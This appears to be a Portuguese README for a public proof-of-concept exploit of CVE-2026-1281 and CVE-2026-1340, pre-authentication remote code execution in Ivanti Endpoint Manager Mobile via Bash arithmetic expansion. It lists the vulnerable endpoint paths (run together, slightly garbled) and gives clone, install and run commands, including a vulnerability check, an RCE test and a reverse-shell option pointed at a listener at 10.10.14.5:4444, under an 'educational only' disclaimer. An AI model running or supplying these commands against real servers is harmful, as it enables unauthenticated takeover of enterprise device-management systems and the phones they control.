
Prova de Conceito para CVE-2026-1281 e CVE-2026-1340 - RCE Pré-Autenticação no Ivanti EPMM via Expansão Aritmética do Bash
⚠️ AVISO: Este PoC é fornecido apenas para fins educacionais e de pesquisa em segurança. O uso sem autorização explícita é ilegal.
Proof of Concept (PoC) completo para a exploração das vulnerabilidades CVE-2026-1281 e CVE-2026-1340 que afetam o Ivanti Endpoint Manager Mobile (EPMM). Essas vulnerabilidades permitem execução remota de código arbitrário (RCE) sem autenticação por meio de um mecanismo de Bash Arithmetic Expansion.
/mifs/c/appstore/fob//mifs/c/aftstore/fob/git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py
# Teste de vulnerabilidade
python3 exploit.py -t https://target.com -c
# Validação RCE
python3 exploit.py -t https://target.com --test-rce
# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
Mehdi Le Deaut - Consultor de Cibersegurança | Especialista em Red Team
Este projeto está licenciado sob a MIT - veja o arquivo LICENSE para mais detalhes.